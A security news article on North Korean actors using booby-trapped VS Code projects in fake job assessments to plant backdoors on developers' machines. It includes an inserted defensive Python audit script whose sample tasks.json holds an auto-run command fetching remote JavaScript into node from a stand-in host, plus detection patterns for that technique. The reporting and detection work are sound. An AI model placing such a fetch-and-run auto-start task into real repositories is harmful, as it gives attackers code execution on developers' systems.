North Korean Hackers’ New Frontier: Malicious VS Code Projects Target Developers

In a concerning evolution of cyber warfare, North Korean state-sponsored threat actors, widely associated with the persistent “Contagious Interview” campaign, are now leveraging malicious Microsoft Visual Studio Code (VS Code) projects to infiltrate developer systems. This sophisticated new tactic, first identified in late 2025 by Jamf Threat Labs, marks a significant escalation in their efforts to compromise high-value targets within the tech and finance sectors.

The Deceptive Lure: A Job Assessment Gone Wrong

The core of this attack hinges on social engineering, preying on developers’ professional aspirations. Prospective victims are instructed to clone a seemingly legitimate code repository from platforms like GitHub, GitLab, or Bitbucket. The catch? This repository is part of a bogus “job assessment” designed to trick developers into launching the project within VS Code.

Security researcher Thijs Xhaflaire of Jamf Threat Labs explains, “This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system.” Once the project is opened, the malicious VS Code task configuration files (tasks.json) spring into action. These files are configured with a “runOn: folderOpen” option, ensuring that embedded arbitrary commands are executed automatically upon opening the project or any file within it.

Multi-Stage Malware Deployment and Evasion

The immediate objective is to deploy sophisticated backdoors such as “BeaverTail” and “InvisibleFerret.” These payloads are often staged on Vercel domains, with the execution tailored to the victim’s operating system. A particularly insidious aspect of the campaign involves concealing multi-stage droppers within task configuration files, disguised as innocuous spell-check dictionaries. This serves as a robust fallback mechanism, ensuring malware delivery even if the primary Vercel domain payload fails.

The obfuscated JavaScript embedded within these files executes instantly when the project is opened. It establishes covert communication with a remote server (e.g., ip-regions-check.vercel[.]app) and awaits further instructions, executing any JavaScript code received.

An Undocumented Infection Method

Jamf’s latest findings reveal an even more advanced, previously undocumented infection method. While the initial vector—cloning and opening a malicious Git repository in VS Code—remains consistent, the subsequent steps have evolved. “When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire notes. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”

For macOS users, this is particularly dangerous. The tasks.json file triggers a background shell command using nohup bash -c and curl -s to retrieve a JavaScript payload remotely. This payload is then piped directly into the Node.js runtime, allowing execution to persist even if VS Code is terminated, all while suppressing command output to remain undetected.
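A defender-side check for the mechanism described above, as an added example that is not code from Jamf Threat Labs or from the article: a small Python audit that parses a repository's .vscode/tasks.json (including VS Code's per-OS override blocks), flags any task whose runOptions.runOn is set to folderOpen, and reports shell indicators matching the behaviour described here (a remote fetch piped into node, nohup, suppressed output). The sample tasks.json and the payload.example.invalid domain are constructed for illustration; run it against a cloned repository before granting Workspace Trust.

```python
import json
import re

# Constructed sample .vscode/tasks.json (JSONC, as VS Code accepts it); not taken from any real repository.
SAMPLE_TASKS_JSON = r'''{
  // constructed example: one normal task and one auto-run task that fetches remote code
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "osx": {"command": "nohup bash -c 'curl -s https://payload.example.invalid/x.js | node' >/dev/null 2>&1 &"}}
  ]
}'''

# (pattern, why it matters) pairs derived from the behaviour the article describes
INDICATORS = [
    (r"\b(curl|wget)\b[^|]*\|\s*(node|bash|sh|zsh|python3?)\b", "remote fetch piped into an interpreter"),
    (r"\bnohup\b", "detached execution that survives VS Code exiting"),
    (r">\s*/dev/null", "output suppressed"),
    (r"\b(bash|sh|zsh)\s+-c\b", "inline shell string"),
]

def load_jsonc(text: str) -> dict:
    """Parse VS Code's JSON-with-comments: drop /* */ and full-line // comments plus trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)  # full-line only, so 'https://' inside values survives
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)

def task_commands(task: dict) -> list:
    """Collect command + args from the task body and from any per-OS override block (windows/osx/linux)."""
    out = []
    for scope in (task, task.get("windows", {}), task.get("osx", {}), task.get("linux", {})):
        cmd = scope.get("command")
        if cmd:
            args = [a.get("value", "") if isinstance(a, dict) else str(a) for a in scope.get("args", [])]
            out.append(" ".join([str(cmd), *args]))
    return out

def audit_tasks(tasks_json_text: str) -> list:
    """Return one finding per task that either auto-runs on folder open or matches an indicator."""
    findings = []
    for task in load_jsonc(tasks_json_text).get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        joined = " ".join(task_commands(task))
        hits = [why for pattern, why in INDICATORS if re.search(pattern, joined)]
        if auto_run or hits:
            findings.append({"label": task.get("label", "<unnamed>"), "auto_run": auto_run, "indicators": hits})
    return findings
```

A task that auto-runs on folder open is worth a manual look even when no indicator fires, since the fetch can be split across args or hidden behind a local script.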

The Backdoor’s Capabilities and AI Suspicions

The final JavaScript payload, also hosted on Vercel, forms the main backdoor. It establishes a persistent execution loop, gathering basic host information and maintaining continuous communication with the command-and-control server. This enables remote code execution, system fingerprinting, and further malicious activities.

In one observed instance, additional JavaScript instructions were executed approximately eight minutes post-infection, designed to beacon to the server every five seconds, run more code, and meticulously erase traces of its activity upon receiving a signal from the operator. Intriguingly, the presence of inline comments and specific phrasing in the source code has led researchers to suspect that some of these scripts might have been generated using artificial intelligence (AI) tools.

Why Developers? The DPRK’s Strategic Targets

North Korea-linked threat actors, often referred to as the Democratic People’s Republic of Korea (DPRK) state-sponsored groups, consistently target software engineers. Their focus is particularly sharp on those in the cryptocurrency, blockchain, and fintech sectors. The reason is clear: these professionals often possess privileged access to financial assets, digital wallets, sensitive source code, intellectual property, and critical internal systems.

Compromising such accounts and systems allows attackers to siphon digital assets, steal proprietary information, and gain unauthorized access to vital infrastructure. These continuous adaptations in tactics underscore the DPRK’s relentless pursuit of cyber espionage and financial gain, crucial for sustaining a heavily sanctioned regime.

Broader Campaign Echoes and Developer Vigilance

This evolving threat is not isolated. Red Asgard recently detailed its investigation into a similar malicious repository using VS Code task configurations to deploy the “Tsunami” (aka TsunamiKit) backdoor alongside an XMRig cryptocurrency miner. Furthermore, Security Alliance reported on a campaign where an unspecified victim was approached on LinkedIn by threat actors impersonating a chief technology officer, again leveraging VS Code tasks in the attack.

The message is clear: developers must exercise extreme caution when interacting with external repositories, especially those presented as part of unsolicited job opportunities or assessments. Verifying the authenticity of sources and understanding the implications of granting trust within IDEs like VS Code are paramount to safeguarding against these sophisticated and persistent threats.
